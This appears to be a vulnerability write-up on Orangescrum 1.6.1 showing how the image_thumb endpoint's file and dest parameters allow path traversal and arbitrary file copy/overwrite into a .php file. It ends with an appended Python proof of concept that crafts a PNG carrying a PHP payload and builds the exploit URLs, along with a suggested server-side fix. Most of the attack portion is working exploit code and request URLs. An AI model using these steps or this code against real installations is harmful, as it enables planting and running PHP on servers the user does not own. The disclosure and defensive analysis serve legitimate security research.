The second bug in Orangescrum 1.6.1 I want to discuss is an arbitrary file copy/overwrite.
OK, let's start.
Open the “Users” menu, then click on a profile image and open it in a new tab. The new tab will have a URL like this: http://localhost/orangescrum/users/image_thumb/?type=photos&file=a6ebd6bd62ba537f37b7b8ac40aa626d.png&sizex=94&sizey=94&quality=100
It shows the user's profile image.
The file is physically located at app/webroot/files/photos.
Now we try to modify the URL: replace the file value with ../../img/filter_icon.png (the same path traversal that is used in the copy URL further down).
It opens a file located at webroot/img/filter_icon.png, so the file parameter is not confined to the photos directory.
Hmmmmmmmm, so how do we copy anything into anything, as I said before?
Let's take a look at the code. The code that processes the URL we talked about is in app/webroot/users/image_thumb/index.php, in the function image_thumb.
It calls another function, GenerateThumbFile, located in app/webroot/users/image_thumb/ImageComponent.php.
TL;DR 😀 😀 It copies the source image as-is (no resizing) when all of these conditions are met:
- the value of the GET parameter sizex equals the real width of the image
- the value of the GET parameter sizey equals the real height of the image
- $this->image_type is true (don't worry, it is true by default)
- a destination file name is supplied; it can be given in the GET parameter dest
- USE_S3 is set to 0 (the default is 0)
OK, let's try to copy filter_icon.png into app/webroot/files/photos/hacked.php.
So the URL will be http://localhost/orangescrum/users/image_thumb/?type=photos&file=../../img/filter_icon.png&sizex=13&sizey=14&quality=100&dest=hacked.php (sizex=13 and sizey=14 are the real dimensions of filter_icon.png, which satisfies the first two conditions).
filter_icon.png is copied unchanged to app/webroot/files/photos/hacked.php.
Now we try to overwrite hacked.php with a6ebd6bd62ba537f37b7b8ac40aa626d.png, so we modify the URL to http://localhost/orangescrum/users/image_thumb/?type=photos&file=a6ebd6bd62ba537f37b7b8ac40aa626d.png&sizex=120&sizey=120&quality=100&dest=hacked.php (again with sizex/sizey set to that photo's real dimensions, 120x120).
What if we change our profile image to an image with PHP injected into its EXIF data and do the same as above? I tried and succeeded. You can try it yourself.
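The conditions listed above and the copy/overwrite steps that follow, as an added example that is not code from the original post or from Orangescrum: a small Python PoC helper that (1) builds a constructed PNG carrying a PHP payload in a tEXt chunk (PNG text metadata stands in for the EXIF injection described above; any metadata that an as-is file copy leaves intact works the same way), (2) reads the image's real width and height so sizex/sizey satisfy the copy condition, (3) assembles the image_thumb URLs, and (4) shows the kind of server-side check the endpoint is missing. The base URL, the stored file name, the payload, the hacked.php destination and the extension whitelist are assumptions, and the fix sketched in is_safe_thumb_request is mine, not the project's.

```python
"""PoC helpers for the Orangescrum 1.6.1 image_thumb copy/overwrite (added
example; not code from the post or from Orangescrum). Runs offline."""
import struct
import zlib
from typing import Optional
from urllib.parse import urlencode

PNG_SIG = b"\x89PNG\r\n\x1a\n"
ALLOWED_EXT = {"png", "jpg", "jpeg", "gif"}  # assumed whitelist for the fix


def _chunk(ctype: bytes, body: bytes) -> bytes:
    """Encode one PNG chunk: length, type, data, CRC32 over type+data."""
    crc = zlib.crc32(ctype + body) & 0xFFFFFFFF
    return struct.pack(">I", len(body)) + ctype + body + struct.pack(">I", crc)


def build_png_with_payload(width: int, height: int, payload: bytes) -> bytes:
    """Valid 8-bit RGB PNG (all black) with `payload` stored verbatim in a
    tEXt chunk. A thumbnailer that falls back to a plain file copy when the
    requested size equals the real size keeps every byte, so the payload
    survives into a .php destination."""
    ihdr = struct.pack(">IIBBBBB", width, height, 8, 2, 0, 0, 0)
    text = b"Comment\x00" + payload                  # keyword, NUL, Latin-1 text
    raw = (b"\x00" + b"\x00" * 3 * width) * height  # filter byte 0 + RGB pixels
    return (PNG_SIG + _chunk(b"IHDR", ihdr) + _chunk(b"tEXt", text)
            + _chunk(b"IDAT", zlib.compress(raw)) + _chunk(b"IEND", b""))


def jpeg_sof_stub(width: int, height: int) -> bytes:
    """Constructed JPEG header (SOI, APP0, SOF0) with no scan data: enough to
    exercise dimension parsing, not a decodable picture."""
    app0 = b"\xff\xe0" + struct.pack(">H", 16) + b"JFIF\x00\x01\x01\x00\x00\x01\x00\x01\x00\x00"
    sof0 = b"\xff\xc0" + struct.pack(">HBHH", 11, 8, height, width) + b"\x01\x01\x11\x00"
    return b"\xff\xd8" + app0 + sof0


def image_size(data: bytes):
    """(width, height) of a PNG or JPEG. The copy branch only fires when
    sizex/sizey equal the real dimensions, so read them from the actual file."""
    if data.startswith(PNG_SIG):
        return struct.unpack(">II", data[16:24])     # IHDR is always first
    if data.startswith(b"\xff\xd8"):
        i = 2
        while i + 9 <= len(data):
            if data[i] != 0xFF:
                raise ValueError("bad JPEG marker")
            m = data[i + 1]
            if m == 0x01 or 0xD0 <= m <= 0xD9:       # standalone markers, no length
                i += 2
                continue
            seglen = struct.unpack(">H", data[i + 2:i + 4])[0]
            if 0xC0 <= m <= 0xCF and m not in (0xC4, 0xC8, 0xCC):  # SOFn
                h, w = struct.unpack(">HH", data[i + 5:i + 9])
                return w, h
            i += 2 + seglen
        raise ValueError("no SOF segment")
    raise ValueError("not PNG or JPEG")


def thumb_url(base: str, file: str, width: int, height: int,
              dest: Optional[str] = None) -> str:
    """image_thumb request as shown in the post; `dest` turns it into a copy."""
    params = {"type": "photos", "file": file, "sizex": width,
              "sizey": height, "quality": 100}
    if dest is not None:
        params["dest"] = dest
    return f"{base}/users/image_thumb/?{urlencode(params)}"


def is_safe_thumb_request(params: dict) -> bool:
    """Server-side check the endpoint needs (assumed fix, not Orangescrum's
    code): file and dest must be bare names with an image extension, so
    neither traversal nor a .php destination can reach the copy branch."""
    for key in ("file", "dest"):
        name = params.get(key)
        if name is None:
            continue
        if "/" in name or "\\" in name or name.startswith("."):
            return False
        if "." not in name or name.rsplit(".", 1)[1].lower() not in ALLOWED_EXT:
            return False
    return True


def poc_plan(base: str, stored_name: str, payload: bytes):
    """The post's last step: craft the profile image, then copy it over
    hacked.php. Returns (png_bytes, copy_url). Uploading the PNG as the profile
    photo happens in the UI; `stored_name` is the hashed name the app assigns."""
    png = build_png_with_payload(120, 120, payload)
    w, h = image_size(png)
    return png, thumb_url(base, stored_name, w, h, dest="hacked.php")


if __name__ == "__main__":
    png, url = poc_plan("http://localhost/orangescrum",            # placeholder host
                        "a6ebd6bd62ba537f37b7b8ac40aa626d.png",    # placeholder name
                        b'<?php echo "orangescrum-poc"; ?>')
    open("profile.png", "wb").write(png)
    print(url)
```

The only thing the PoC really depends on is getting the true dimensions right, which is why image_size parses the file instead of trusting the sizex/sizey the UI happened to use. On the defensive side, the name whitelist above stops both of the post's requests, but a real fix should also re-encode the image (for example decode and re-save it with GD) instead of copying the upload as-is, so that injected metadata never reaches the destination even when the requested size matches; that re-encoding step is an assumption about the fix, not something the post describes.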
Other related links: